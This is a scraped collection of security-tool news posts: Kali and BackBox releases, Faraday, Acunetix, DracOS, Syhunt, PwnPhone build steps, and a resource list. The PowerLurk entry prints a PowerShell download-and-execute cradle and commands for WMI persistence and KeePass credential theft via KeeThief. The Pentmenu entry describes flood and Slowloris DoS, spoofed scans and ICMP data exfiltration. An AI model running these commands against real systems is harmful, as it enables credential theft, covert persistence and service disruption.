Kali Linux 2017.1 Release

Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack. Kali Linux is the most versatile and advanced penetration testing tool release operating system. Kali tools are often updated and can be used on other platforms, such as VMware and ARM.

Today, Offensive Security has been released Kali Linux 2017.1.

What’s new?

Support for RTL8812AU Wireless Card Injection
Streamlined Support for CUDA GPU Cracking
Amazon AWS and Micsosoft Azure Availability (GPU Support)
OpenVAS 9 Packaged in Kali Repositories
More info, please visit Kali Linux home page.

How to update to Kali Linux 2017.1

Open terminal and run command

apt update

apt dist-upgrade

reboot

If you want to download Kali Linux image for fresh installing, you can download Kali Linux 2017.1 here

Read More

Collaborative Penetration Test and Vulnerability Management Platform - Faraday v2.2

Faraday is the Integrated Multiuser Risk Environment you were looking for! It maps and leverages all the knowledge you generate in real time, letting you track and understand your audits. Our dashboard for CISOs and managers uncovers the impact and risk being assessed by the audit in real-time without the need for a single email. Developed with a specialized set of functionalities that help users improve their own work, the main purpose is to re-use the available tools in the community taking advantage of them in a collaborative way!

This release features a brand new library to connect with Faraday Server!

Managing vulnerabilities is now easier in Faraday!

Status and creator fields

A simple change can go a long way - we added two new ways of classifying issues stored in Faraday.

With the new update it is now possible to check the status of an issue - this could be opened, closed, re-opened or the risk is accepted.

If you set a vulnerability status as closed and later on when you re-scan the target the same issue is found again, the status will automatically change into re-opened allowing you to have a more granular view of the results of your scans. This is perfect for doing remediation retests, helping you to quickly understand what is still vulnerable.

Also, issues created by a specific tool, can now be filtered and sorted out. A great way to see where are the sources of information used during an engagement.

For example, as we can see in the following screenshots, we have three different issues that are closed [1]. After we import a Nessus scan the issues are marked as re-opened [2], indicating that the vulnerability is still present in the last scan.

1. Closed issues

2. Re-opened by Nessus scan import

Corporate Changes:

• Added a message to configure the Webshell - added a descriptive message for users who don’t have the Webshell properly configured

Webshell configuration message

Changes:

• New library to connect with Faraday Server 
• Fixed Fplugin, now it uses the new library to communicate with the Server 
• New fields for Vulnerabilities: plugin creator and status
• Refactor in Faraday Core and GTK Client 
• Bug fixing in Faraday Client and Server 

• News boxes example in the WEB UI
• New plugins: Dirb, Netdiscover, FruityWifi, Sentinel 
• Improvements on the WPscan plugin 
• Fixed Licenses search - there was a bug that disabled the option to search for licenses, now it is fixed and full-text search is enabled in the Licenses component

Licenses search

• Refactor Licenses module to be compatible with JS Strict Mode - in our efforts to improve our existing codebase for the WEB UI we refactored this component in order to make it run using Strict Mode in JavaScript

https://www.faradaysec.com
https://github.com/infobyte/faraday
https://twitter.com/faradaysec
https://forum.faradaysec.com/

Download Faraday

Read More

Web Application Security Testing Tool - Acunetix v11

London, UK – November 2016 – Acunetix, the pioneer in automated web application security software, has announced the release of version 11. New integrated vulnerability management features extend the enterprise’s ability to comprehensively manage, prioritise and control vulnerability threats – ordered by business criticality. Version 11 includes a new web-based UI for greater ease-of-use and manageability, providing access by multiple users.

For the first time in the marketplace Acunetix is launching an enterprise-level product that integrates sophisticated automated testing technology with vulnerability management, at a price point accessible to every development team. Chris Martin, CEO, Acunetix explains:

“Acunetix has for the past 12 years been at the forefront in web application security with its cutting-edge vulnerability scanning technology. With version 11 we have combined proactive scanning for web application vulnerabilities with the prioritization of mitigation activities. This integration helps security teams gain the intelligence they need to work more efficiently, prioritizing actions, assigning jobs and therefore reducing costs.”

The new web-based interface significantly improves the manageability of the Acunetix on-premises solution, making it easy for less seasoned security personnel to check the vulnerabilities within the company’s web assets. In addition, user privileges can be automatically assigned.

Nicholas Sciberras, CTO, Acunetix, comments: “Version 11 helps organizations engaged heavily in application development by utilising a role-based multi-user system.”

Inbuilt Vulnerability Management

New integrated vulnerability management features allow for the review of aggregated vulnerability data across all Targets, prioritizing security risks and therefore providing a clear view of the business’ security posture, while facilitating compliance.

New inbuilt vulnerability management features include:

• All Targets (web applications to scan) are now stored in Acunetix with their individual settings and can be easily re-scanned.
• Targets are displayed in one interface and classified by business criticality, allowing you to easily focus on the most important assets.
• Vulnerabilities can also be prioritized by the Target’s business criticality.
• Consolidated reports are stored in the central interface.
• Users can choose between “Target reports”, “Scan reports” or “All Vulnerabilities” report.

Web-based user interface

The user interface has been re-engineered from the ground up for greater usability and manageability. The minimalist design focuses on the most widely used and important features, doing away with extras which cluttered the screen. Since the interface is now web-based, multiple users can access it from their browser irrespective of the OS used.

Role-based multi-user system

Acunetix version 11 allows the creation of multiple user accounts, which can be assigned a particular group of targets. Depending on the privileges assigned to the user, the user can create, scan, and report on the targets assigned to him.This is particularly important for large enterprises, which require multiple users to help secure their assets.

Standard, Pro and Enterprise Editions

Acunetix version 11 will be available in three main editions: Standard, Pro and Enterprise.

Standard Edition – is the entry level, ideal for small organisations and single workstation users. The Standard Edition offers the same level of vulnerability detection provided in the Pro and Enterprise Editions and includes Developer, Executive Summary and OWASP Top 10 reports.

Pro Edition – The Pro Edition allows outsourced or insourced security professionals to group and classify asset targets. It integrates with Software Development Life Cycle (SDLC) project management or bug tracking systems, includes comprehensive compliance reports, and integrates with top Web Application Firewalls (WAFs).

Enterprise Edition – includes full multi-user team support and has the ability to deploy multiple scan engines managed by the central system. The Enterprise Edition will be able to scale from 3 to unlimited users and up to 50 Acunetix scan engines.

Download Acunetix v11

Read More

BackBox Linux 4.7 released!

BackBox Linux 4.7 released!


The BackBox Team is pleased to announce the updated release of BackBox Linux, the version 4.7.

We thought to release a new minor version to give our users the opportunity to have a stable and up-to-date sytem till the next official major release, i.e. BackBox 5, stilll under development.

In this release we have fixed some minor bugs, updated the kernel stack, base system and tools.

The ISO images for 32bit & 64bit can be downloaded from the official web site download section:

BackBox

What's new

Updated Linux Kernel 4.4
Updated hacking tools: beef, metasploit, openvas, setoolkit, sqlmap, wpscan, etc.

System requirements

32-bit or 64-bit processor
1024 MB of system memory (RAM)
10 GB of disk space for installation
Graphics card capable of 800×600 resolution
DVD-ROM drive or USB port (3 GB)

Upgrade instructions

To upgrade from a previous version (BackBox 4.x) follow these instructions:

sudo apt-get update

sudo apt-get dist-upgrade

sudo apt-get install -f



sudo apt-get install --install-recommends linux-generic-lts-xenial xserver-xorg-core-lts-xenial xserver-xorg-lts-xenial xserver-xorg-video-all-lts-xenial xserver-xorg-input-all-lts-xenial libwayland-egl1-mesa-lts-xenial



sudo apt-get install ruby ruby-dev ruby2.1 ruby2.1-dev ruby2.2-dev ruby2.2 --reinstall

sudo apt-get purge ri1.9.1 ruby1.9.1 bundler libruby2.0 ruby2.0 ruby2.0-dev libruby1.9.1 ruby-full

sudo gem cleanup

sudo rm -rf /var/lib/gems/1.*

sudo rm -rf /var/lib/gems/2.0.*

sudo apt-get install backbox-default-settings backbox-desktop backbox-menu backbox-tools --reinstall

sudo apt-get install beef-project metasploit-framework whatweb wpscan setoolkit --reinstall

sudo apt-get autoremove --purge

sudo apt-get install openvas sqlite3

sudo openvas-launch sync

sudo openvas-launch start

sudo update-rc.d apache2 disable

sudo update-rc.d polipo disable

sudo update-rc.d openvas-gsa disable

sudo update-rc.d openvas-manager disable

sudo update-rc.d openvas-scanner disable



sudo apt-get autoremove --purge

BackBox Download

Read More

Lightweight and Powerful Penetration Testing OS - DracOS

Dracos Linux ( www.dracos-linux.org ) is the Linux operating system from Indonesian , open source is built based on the Linux From Scratch under the protection of the GNU General Public License v3.0. This operating system is one variant of Linux distributions, which is used to perform security testing (penetration testing). Dracos linux in Arm by hundreds hydraulic pentest, forensics and reverse engineering. Does not use a GUI-based tools-tools and just have the software using the CLI (command line interface) to perform its operations. Now Dracos currently already up to version 2.0 with the code name "Leak".

Screenshot

Teaser

As the target of development

Education
Dracos Linux is purposed as an educational,especially to recognize the operation system of linux and we respect ethical hacking.

Build from source
had always been built from codes instead of installer,this will stimulate users in indonesia to stay creative and to build the spirit of opensource.

Repository
even though proportionally based on codes,Dracos Linux still intends to construct the repository to build up the processes Like Venomizer

Heavy Control
We need to recognize this operating system Very Dificult Because Dracos in build from source code, thus forcing us to compile when installing a package or software, which of course will arise the possibility of system failure and other system vulnerabilities.

Always from terminal
None of every singel tool that was installed inside the OS uses GUI. CLI will always consider to particularly openbox to ease the users in need of multi terminal in applying Penetration Testing

Penetration Tools List
Link : http://dev.dracos-linux.org/projects/dracoslinux/wiki/Penetration_Testing

• Information Gathering
• Vulnerability Assessment
• Web Attack
• Exploitation Testing
• Privilege Escalation
• Password Attack
• Social Engineering
• Man In The Middle Attack
• Stress Testing
• Wireless Attack
• Maintaining Access
• Forensics Tools
• Reverse Engineering
• Malware Analysis
• Covering Track

Download DracOS

Read More

Malicious WMI Events using PowerShell - PowerLurk

PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions. The goal is to make WMI events easier to fire off during a penetration test or red team engagement. Please see my post Creeping on Users with WMI Events: Introducing PowerLurk for more detailed information: https://pentestarmoury.com/2016/07/13/151/

To use PowerLurk, you must import the PowerLurk.ps1 module into your instance of PowerShell. This can be done a couple of ways:

Import locally

    PS> powershell.exe -NoP -Exec ByPass -C Import-Module c:\\temp\\PowerLurk.ps1   

Download Cradle

    PS> powershell.exe -NoP -C "IEX (New-Object Net.WebClient).DownloadString('http://<IP>/PowerLurk.ps1'); Get-WmiEvent"   

Get-WmiEvent
By default, Get-WmiEvent queries WMI for all __FilterToConsumerBinding instances and associated __EventFilter, and __EventConsumer instances. Objects returned can be deleted by piping to Remove-WmiObject.
Return all active WMI event objects with the name 'RedTeamEvent'

    Get-WmiEvent -Name RedTeamEvent   

Delete 'RedTeamEvent' WMI event objects

    Get-WmiEvent -Name RedTeamEvent | Remove-WmiObject   

Register-MaliciousWmiEvent
This cmdlet is the core of PowerLurk. It takes a command, script, or scriptblock as the action and a precanned trigger then creates the WMI Filter, Consumer, and FilterToConsumerBinding required for a fully functional Permanent WMI Event Subscription. A number of WMI event triggers, or filters, are preconfigured. The trigger must be specified with the -Trigger parameter. There are three consumers to choose from, PermanentCommand, PermanentScript, and LocalScriptBLock. Example usage:
Write the notepad.exe process ID to C:\temp\log.txt whenever notepad.exe starts

    Register-MaliciousWmiEvent -EventName LogNotepad -PermanentCommand “cmd.exe /c echo %ProcessId% >> c:\\temp\\log.txt” -Trigger ProcessStart -ProcessName notepad.exe   

Cleanup Malicious WMI Event

    Get-WmiEvent -Name LogNotepad | Remove-WmiObject   

Add-KeeThiefLurker
creates a permanent WMI event that will execute KeeThief (See @Harmj0y's KeeThief at https://github.com/adaptivethreat/KeeThief ) 4 minutes after the 'keepass' process starts. This gives the target time to log into their KeePass database.
The KeeThief logic and its output are either stored in a custom WMI namespace and class or regsitry values. If a custom WMI namespace and class are selected, you have the option to expose that namespace so that it can be read remotely by 'Everyone'. Registry path and value names are customizable using the associated switches; however, this is optional as defaults are set. Example usage:
Add KeeThiefLurker event using WMI class storage

    Add-KeeThiefLurker -EventName KeeThief -WMI   

Query custom WMI class

    Get-WmiObject -Namespace root\software win32_WindowsUpdate -List   

Extract KeeThief output from WMI class

    [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($(Get-WmiObject -Namespace root\software win32_WindowsUpdate -List).Properties['Output'].value))   

Cleanup KeeThiefLurker

    Remove-KeeThiefLurker -EventName KeeThief -WMI   

Download PowerLurk

Read More

Console Web Vulnerability Scan Tools - Syhunt ScanTools

Syhunt released the new generation of its console-based scan tools, simply called ScanTools. The first release of ScanTools comes with four console applications: - ScanURL,ScanCode, ScanLog and ScanConf, incorporating the functionality of the scanners Syhunt Hybrid/Dynamic, Syhunt Code, Syhunt Insight and Syhunt Harden respectively. Whether you want to scan a live web application, source code files, web server logs or configuration files for vulnerabilities, weaknesses and more, ScanTools can help you start the task with a single line command. Syhunt ScanTools is available for download as a freeware portable package or as part of Syhunt Community.

Installation

Download Information

Syhunt ScanTools is included with the latest release of Syhunt. It is located in the installation directory of the suite.

Please note that the full-featured version of the tools is only available for registered users.

System Requirements

1. 512 MB of memory
2. 200 MB of free disk space
3. Internet connection (optional for remote scanning)
4. Windows XP, 2003, 2008, Vista, 7, 8 or 10.

Usage

Just run any of the Scan*.exe apps, which are located in the installation directory of Syhunt Hybrid, with no parameters to see usage instructions.

Supported Hunt Methods

For detailed information about scan methods, see the Hunt Methods page.

Scanning IPv6 addresses

Scanurl fully supports the scanning of IPv6 addresses. To scan an IPv6 target, enclose the address in square brackets, eg:

Scanurl http://[2001:4860:0:2001::68]

Black Box (Dynamic Scan)

1. Go to the directory Syhunt Hybrid is installed using the command prompt.
2. Use the following command-line:

 Scanurl [starturl] -hm:[a huntmethod]] -gr

 Example:
 Scanurl http://www.somehost.com -hm:appscan -gr

White Box (Source Code Scan)

1. Go to the directory Syhunt is installed using the command prompt.
2. Example command-line:

 Scancode C:\WWW\Docs\ -gr

Gray Box (Dynamic + Code Scan)

1. Go to the directory Syhunt Hybrid is installed using the command prompt.
2. Use the following command-line:

 Scanurl [starturl] -hm:[a huntmethod]] -srcdir:"[SourceDir]" -gr

 Example:
 Scanurl localhost -hm:appscan -srcdir:"C:\WWW\Docs\" -gr

Note: if you already entered the source code directory for the target host using the Syhunt Hybrid GUI in a past scan it is not necessary to assign it again using the -srcdir command.

Download  Syhunt ScanTools

Read More

Build Your Own - PwnPhone

Build Your Own PwnPhone

We’ll attempt to show you how to build your own Pwn Phone running the Kali operating system and our AOPP (Android Open Pwn Project) image.

Let’s get cracking…

Flashing the Phone

1. Download the Recovery image for your device:
   https://twrp.me/Devices
2. Connect the device to the host machine via USB cable.
3. Power off the device and boot into the Bootloader:
   Press and hold the Power & Volume-Down buttons
4. Confirm the device is recognized by the host machine:
   (a device should be listed when the command returns)
   $ fastboot devices
5. Unlock the device:$ fastboot oem unlock
6. Once unlocked, flash the Recovery image:$ fastboot flash recovery <name-of-recovery-image>.img
7. Once the Recovery image has been flashed, boot into Recovery from the Bootloader:
   Use the Volume-Down/Up buttons to cycle through the Bootloader options and then the Power button to select
8. If prompted, swipe “Swipe to Allow Modifications”.
9. Once in Recovery, wipe the device:
   Tap Wipe > Advanced Wipe > tap: Dalvik/ART cache, System, Cache, Data > swipe “Swipe to Wipe”
10. Once wiped, do NOT boot into System (You don’t have one; you just wiped it). Tap the Home button to return to the Recovery home screen.
11. Confirm again the device is recognized by the host machine:
    (a device should be listed when the command returns)$ adb devices
12. From the host machine, push the downloaded AOPP ROM zip to the device sdcard:
    $ adb push <name-of-rom-zip>.zip /sdcard/
13. On device, tap Install and then select the AOPP ROM zip from /sdcard.
14. Swipe “Swipe to Confirm Flash”
15. Once installed, tap “Reboot System”

OK Now Let’s Build the Phone

Downloading the Source

1. Refer to “Downloading and Building Requirements” before proceeding:
   https://source.android.com/source/requirements.html
2. Refer to “Downloading the Source” before proceeding:
   https://source.android.com/source/downloading.html
3. Create a directory for the build system to live in and cd into that directory:$ mkdir <WORKING_DIR>$ cd <WORKING_DIR>
4. Initialize a local repository using this source tree, use the command:
   $ repo init -u git@github.com:aopp/android_platform.git -b px-0.1
5. Sync the repository, use:
   $ repo sync

Building

Devices are referred to by codename (e.g. hammerhead). Make sure to use this when substituting <device-codename> in the following instruction set.

1. Refer to “Building the System” before proceeding:
   https://source.android.com/source/building.html
   
2. To initialize the build environment, use the following command:$ . build/envsetup.sh
3. Prepare the build environment (download device-tree and dependencies) for your specific device:$ breakfast <device-codename>
4. Connect the device running a working AOPP/AOSP ROM to the host machine via USB.
5. Make sure it is booted into system and confirm the device is recognized by the host machine:
   (a device should be listed when the command returns)$ adb devices
6. Enter the device directory:$ cd <WORKING_DIR>/device/<vendor>/<device-codename>/
7. Extract the proprietary binaries from your device:$ ./extract-files.sh
8. Return to the root of the build system:$ croot
9. Start a build run for your device:
   $ brunch <device-name>
10. Once complete, the ROM zip can be found in the out/ directory:$ cd /out/target/product/<device-codename>
11. The flashable ROM zip (product of the build run) will be located in the out/ directory as:
    aopp-0.1-<build-date>-UNOFFICIAL-<device-codename>.zip

Flashing

1. Download and install the command line tools for your OS: https://developer.android.com/studio/index.html#downloads
   
2. Download the AOPP ROM for your device:
   https://wiki.pwnieexpress.com/index.php/Official_devices
   
3. Download the Recovery image for your device:
   https://twrp.me/Devices
   
4. Connect the device to the host machine via USB cable.
5. Power off the device and boot into the Bootloader:
   Press and hold the Power & Volume-Down buttons
6. Confirm the device is recognized by the host machine:
   (a device should be listed when the command returns)
$ fastboot devices
7. Unlock the device:
$ fastboot oem unlock
8. Once unlocked, flash the Recovery image:$ fastboot flash recovery <name-of-recovery-image>.img
9. Once the Recovery image has been flashed, boot into Recovery from the Bootloader:
   Use the Volume-Down/Up buttons to cycle through the Bootloader options and then the Power button to select
10. If prompted, swipe “Swipe to Allow Modifications”.
11. Once in Recovery, wipe the device:
    Tap Wipe > Advanced Wipe > tap: Dalvik/ART cache, System, Cache, Data > swipe “Swipe to Wipe”
12. Once wiped, do NOT boot into System (You don’t have one; you just wiped it). Tap the Home button to return to the Recovery home screen.
13. Confirm again the device is recognized by the host machine:
    (a device should be listed when the command returns)$ adb devices
14. From the host machine, push the downloaded AOPP ROM zip to the device sdcard:$ adb push <name-of-rom-zip>.zip /sdcard/
15. On device, tap Install and then select the AOPP ROM zip from /sdcard.
16. Swipe “Swipe to Confirm Flash”
17. Download SuperSU from Chainfire here:
    https://download.chainfire.eu/969/SuperSU/UPDATE-SuperSU-v2.76-20160630161323.zip
18. Push the SuperSU zip to /sdcard/:
    $ adb push <SuperSU-zip-name>.zip /sdcard/
19. Once installed, tap “Reboot System”
20. Hack the Gibson…and remember…hugs are worth more than handshakes

Source: pwnieexpress

Read More

A simple Bash Script for Recon and DOS Attacks - Pentmenu

A bash script inspired by pentbox.

Designed to be a simple way to implement various network pentesting functions, including network attacks, using wherever possible readily available software commonly installed on most linux distributions without having to resort to multiple specialist tools.

Sudo is implemented where necesssary.
Tested on Debian and Arch.

Requirements:

• bash
  
• sudo
  
• curl
  
• netcat (must support '-k' option, openbsd variant recommended)
  
• hping3 (or nping can be used as a substitute for flood attacks)
  
• openssl
  
• stunnel
  
• nmap
  
• whois (not essential but preferred)
  

How to use?

• Download the script:

$ wget https://raw.githubusercontent.com/GinjaChris/pentmenu/master/pentmenu

• Make it executable:

$ chmod +x ./pentmenu

• Run it:

$ ./pentmenu

Alternatively, use git clone, or download the latest release from https://github.com/GinjaChris/pentmenu/releases , extract it and run the script.

More detail

RECON MODULES

• Show IP - uses curl to perform a lookup of your external IP. Runs ip a or ifconfig (as appropriate) to show local interface IP's.
  
• DNS Recon - passive recon, performs a DNS lookup (forward or reverse as appropriate for target input) and a whois lookup of the target. If whois is not available it will perform a lookup against ipinfo.io (only works for IP's, not hostnames).
  
• Ping Sweep - uses nmap to perform an ICMP echo (ping) against the target host or network.
  
• Network Recon - uses nmap to identify live hosts, open ports, attempts OS identification, grabs banners/identifies running software version and attempts OS detection. Nmap will not perform a ping sweep prior as part of this scan. Nmap's default User-Agent string is changed to that of IE11 in this mode, to help avoid detection via HTTP. This scan can take a long time to finish, please be patient.
  
• Stealth Scan - TCP Port scanner using nmap to scan for open ports using TCP SYN scan. Nmap will not perform a ping sweep prior to performing the TCP SYN scan. This scan can take a long time to finish, please be patient.
  
• UDP scan - uses nmap to scan for open UDP ports.
  
• Check Server Uptime - estimates the uptime of the target by querying an open TCP port with hping. Accuracy of the results varies from one machine to another.
  

DOS MODULES

• TCP Syn Flood - sends a flood of TCP SYN packets using hping3. If hping3 is not found, it attempts to use the nmap-nping utility instead. Hping3 is preferred since it sends packets as fast as possible. Options are provided to use a source IP of your interface, or specify (spoof) a source IP, or spoof a random source IP for each packet. Optionally, you can add data to the SYN packet. All SYN packets have the fragmentation bit set and use hpings virtual MTU of 16 bytes, guaranteeing fragmentation. Falling back to nmap-nping means sending X number of packets per second until Y number of packets is sent and only allows the use of interface IP or a specified (spoofed) source IP. 
  A TCP SYN flood is unlikely to break a server, but is a good way to test switch/router/firewall infrastructure and state tables. 
• UDP Flood - much like the TCP SYN Flood but instead sends UDP packets to the specified host:port. Like the TCP SYN Flood function, hping3 is used but if it is not found, it attempts to use nmap-nping instead. All options are the same as TCP SYN Flood, except you can specify data to send in the UDP packets. Again, this is a good way to check switch/router throughput or to test VOIP systems.
  
• SSL DOS - uses OpenSSL to attempt to DOS a target host:port. It does this by opening many connections and causing the server to make expensive handshake calculations. This is not a pretty or elegant piece of code, do not expect it to stop immediately upon pressing 'Ctrl c', but it can be brutally effective. 
  The option for client renegotiation is given; if the target server supports client initiated renegotiation, this option should be chosen. Even if the target server does not support client renegotiation (for example CVE-2011-1473), it is still possible to impact/DOS the server with this attack. 
  It is very useful to run this against loadbalancers/proxies/SSL-enabled servers (not just HTTPS!) to see how they cope under the strain. 
• Slowloris - uses netcat to slowly send HTTP Headers to the target host:port with the intention of starving it of resources. This is effective against many, although not all, HTTP servers, provided the connections can be held open for long enough. Therefore this attack is only effective if the server does not limit the time available to send a complete HTTP request. Some implementations of this attack use clearly identifiable headers which is not the case here. The number of connections to open to the target is configurable. The interval between sending each header line is configurable, with the default being a random value between 5 and 15 seconds. The idea is to send headers slowly, but not so slow that the servers idle timeout closes the connection. The option to use SSL (SSL/TLS) is given, which requires stunnel.
  

Defences against this attack include (but are not limited to):

Limiting the number of TCP connections per client; this will prevent a single machine from making the server unavailable, but is not effective if say, 10,000 clients launch the attack simultaneously. Additionally, such a defensive measure may negatively impact multiple (legitimate) clients operating behind a forward proxy server.

Limiting the time available to send a complete HTTP request; this is effective since the attack relies on slowly sending headers to the server (the server should await all headers from the client before responding). If the server limits the time for receiving all headers of a request to 10 seconds (for example) it will severely limit the effectiveness of the attack. It is possible that such a measure will prevent legitimate clients over slow/lossy connections from accessing the site.

• Distraction Scan - this is not really a DOS attack but simply launches multiple TCP SYN scans, using hping, from a spoofed IP of your choosing (such as the IP of your worst enemy). It is designed to be an obvious scan in order to trigger any lDS/IPS the target may have and so hopefully obscure any actual scan or other action that you may be carrying out.

EXTRACTION MODULES

• File extraction via ICMP - This module uses hping to send data with ICMP packets. It can be extremely useful where only ICMP connectivity is possible.
  
• File receipt via ICMP - This module uses hping to listen for ICMP packets and record the data to an output file of your choice. It will only record packet data starting with the secret that you define. Therefore the extractor and receiver must use an identical secret.
  

An alternative to using this receiver is to run wireshark to capture the inbound icmp packets, which seems quite happy to reconstruct the data received over several fragmented ICMP packets.

• Listener - uses netcat to open a listener on a configurable TCP or UDP port. This can be useful for testing syslog connectivity, receive files or checking for active scanning on the network. Anything received by the listener is written out to ./pentmenu.listener.out.

Disclaimer
This script is only for responsible, authorised use. You are responsible for your own actions and this script is provided without warranty or guarantee of any kind. The author(s) accept no responsibility or liability on your behalf.

Also see
Pentmenu is available as a package on Arch Linux. Big love to ArchStrike and Parrot linux .

Download Pentmenu

Read More

The Best Penetration Testing Distribution - Kali Linux 2016.2

This release brings a whole bunch of interesting news and updates into the world of Kali.

New KDE, MATE, LXDE, e17, and Xfce Builds

Although users are able to build and customize their Kali Linux ISOs however they wish, we often hear people comment about how they would love to see Kali with $desktop_environment instead of GNOME. We then engage with those people passionately, about how they can use live-build to customize not only their desktop environment but pretty much every aspect of their ISO, together with the ability to run scripted hooks at every stage of the ISO creation process – but more often than not, our argument is quickly lost in random conversation. As such, we’ve decided to expand our “full” 64bit releases with additional Desktop Environment flavored ISOs, specifically KDE, Mate, LXDE and Enlightenment. These can now be downloaded via our Kali Download page. For those curious to see what the various Desktop Environments look like, we’ve taken some screenshots for you:

Gnome

E17

KDE

LXDE

Mate

Xfce

Kali Linux Weekly ISOs

Constantly keeping Kali on the bleeding edge means frequent updates to packages on an ongoing basis. Since our last release several months ago, there’s a few hundred new or updated packages which have been pushed to the Kali repos. This means that anyone downloading an ISO even 3 months old has somewhat of a long “apt-get dist-upgrade” ahead of them. To help avoid this situation, from this release onwards, we’ll be publishing updated weekly builds of Kali that will be available to download via our mirrors. Speaking of mirrors, we are always in need of support in this area – if you’re capable of running a high-bandwidth mirror and would like to support our project, please check out our Kali Mirrors page.

Bug Fixes and OS Improvements

During these past few months, we’ve been busy adding new relevant tools to Kali as well as fixing various bugs and implementing OS enhancements. For example, something as simple as adding HTTPS support in busybox now allows us to preseed Kali installations securely over SSL. This is a quick and cool feature to speed up your installations and make them (almost) unattended, even if you don’t have a custom built ISO.

To set a preseed file during an install process, choose the “install” option, then hit “tab” and enter the preseed directive, together with a URL pointing to your actual preseed file.

preseed/url=https://www.kali.org/dojo/preseed.cfg

Read more here.

Download Kali Linux 2016.2

Read More

A Collection of Awesome Penetration Testing Resources - OffSec

A collection of awesome penetration testing resources

• Online Resources
  • Penetration Testing Resources
  • Exploit development
  • Social Engineering Resources
  • Lock Picking Resources
• Tools
  • Penetration Testing Distributions
  • Basic Penetration Testing Tools
  • Docker for Penetration Testing
  • Vulnerability Scanners
  • Network Tools
  • Wireless Network Tools
  • SSL Analysis Tools
  • Web exploitation
  • Hex Editors
  • Crackers
  • Windows Utils
  • Linux Utils
  • DDoS Tools
  • Social Engineering Tools
  • OSInt Tools
  • Anonymity Tools
  • Reverse Engineering Tools
  • CTF Tools
• Books
  • Penetration Testing Books
  • Hackers Handbook Series
  • Network Analysis Books
  • Reverse Engineering Books
  • Malware Analysis Books
  • Windows Books
  • Social Engineering Books
  • Lock Picking Books
• Vulnerability Databases
• Security Courses
• Information Security Conferences
• Information Security Magazines
• Awesome Lists
• Contribution
• License
• 
  

Online Resources

Penetration Testing Resources

• Metasploit Unleashed - Free Offensive Security metasploit course
• PTES - Penetration Testing Execution Standard
• OWASP - Open Web Application Security Project

Exploit development

• Shellcode Tutorial - Tutorial on how to write shellcode
• Shellcode Examples - Shellcodes database
• Exploit Writing Tutorials - Tutorials on how to develop exploits
• GDB-peda - Python Exploit Development Assistance for GDB
• shellsploit - New Generation Exploit Development Kit

Social Engineering Resources

• Social Engineering Framework - An information resource for social engineers

Lock Picking Resources

• Schuyler Towne channel - Lockpicking videos and security talks
• /r/lockpicking - Resources for learning lockpicking, equipment recommendations.

Tools

Penetration Testing Distributions

• Kali - A Linux distribution designed for digital forensics and penetration testing
• ArchStrike - An Arch Linux repository for security professionals and enthusiasts
• BlackArch - Arch Linux-based distribution for penetration testers and security researchers
• NST - Network Security Toolkit distribution
• Pentoo - Security-focused livecd based on Gentoo
• BackBox - Ubuntu-based distribution for penetration tests and security assessments
• Parrot - A distribution similar to Kali, with multiple architecture

Basic Penetration Testing Tools

• Metasploit Framework - World's most used penetration testing software
• Burp Suite - An integrated platform for performing security testing of web applications
• ExploitPack - Graphical tool for penetration testing with a bunch of exploits
• BeeF - The Browser Exploitation Framework Project
• faraday - Collaborative Penetration Test and Vulnerability Management Platform
• evilgrade - The update explotation framework
• commix - Automated All-in-One OS Command Injection and Exploitation Tool
• routersploit - Automated penetration testing software for router

Docker for Penetration Testing

• docker pull kalilinux/kali-linux-docker official Kali Linux
• docker pull owasp/zap2docker-stable - official OWASP ZAP
• docker pull wpscanteam/wpscan - official WPScan
• docker pull pandrew/metasploit - docker-metasploit
• docker pull citizenstig/dvwa - Damn Vulnerable Web Application (DVWA)
• docker pull wpscanteam/vulnerablewordpress - Vulnerable WordPress Installation
• docker pull hmlio/vaas-cve-2014-6271 - Vulnerability as a service: Shellshock
• docker pull hmlio/vaas-cve-2014-0160 - Vulnerability as a service: Heartbleed
• docker pull opendns/security-ninjas - Security Ninjas
• docker pull diogomonica/docker-bench-security - Docker Bench for Security
• docker pull ismisepaul/securityshepherd - OWASP Security Shepherd
• docker pull danmx/docker-owasp-webgoat - OWASP WebGoat Project docker image
• docker pull citizenstig/nowasp - OWASP Mutillidae II Web Pen-Test Practice Application

Vulnerability Scanners

• Netsparker - Web Application Security Scanner
• Nexpose - Vulnerability Management & Risk Management Software
• Nessus - Vulnerability, configuration, and compliance assessment
• Nikto - Web application vulnerability scanner
• OpenVAS - Open Source vulnerability scanner and manager
• OWASP Zed Attack Proxy - Penetration testing tool for web applications
• Secapps - Integrated web application security testing environment
• w3af - Web application attack and audit framework
• Wapiti - Web application vulnerability scanner
• WebReaver - Web application vulnerability scanner for Mac OS X
• DVCS Ripper - Rip web accessible (distributed) version control systems: SVN/GIT/HG/BZR
• arachni - Web Application Security Scanner Framework

Network Tools

• nmap - Free Security Scanner For Network Exploration & Security Audits
• pig - A Linux packet crafting tool
• tcpdump/libpcap - A common packet analyzer that runs under the command line
• Wireshark - A network protocol analyzer for Unix and Windows
• Network Tools - Different network tools: ping, lookup, whois, etc
• netsniff-ng - A Swiss army knife for for network sniffing
• Intercepter-NG - a multifunctional network toolkit
• SPARTA - Network Infrastructure Penetration Testing Tool
• dnschef - A highly configurable DNS proxy for pentesters
• DNSDumpster - Online DNS recon and search service
• dnsenum - Perl script that enumerates DNS information from a domain, attempts zone transfers, performs a brute force dictionary style attack, and then performs reverse look-ups on the results
• dnsmap - Passive DNS network mapper
• dnsrecon - DNS Enumeration Script
• dnstracer - Determines where a given DNS server gets its information from, and follows the chain of DNS servers
• passivedns-client - Provides a library and a query tool for querying several passive DNS providers
• passivedns - A network sniffer that logs all DNS server replies for use in a passive DNS setup
• Mass Scan - TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.
• Zarp - Zarp is a network attack tool centered around the exploitation of local networks
• mitmproxy - An interactive SSL-capable intercepting HTTP proxy for penetration testers and software developers
• mallory - HTTP/HTTPS proxy over SSH
• Netzob - Reverse engineering, traffic generation and fuzzing of communication protocols
• DET - DET is a proof of concept to perform Data Exfiltration using either single or multiple channel(s) at the same time
• pwnat - punches holes in firewalls and NATs
• dsniff - a collection of tools for network auditing and pentesting
• tgcd - a simple Unix network utility to extend the accessibility of TCP/IP based network services beyond firewalls
• smbmap - a handy SMB enumeration tool
• scapy - a python-based interactive packet manipulation program & library

Wireless Network Tools

• Aircrack-ng - a set of tools for auditing wireless network
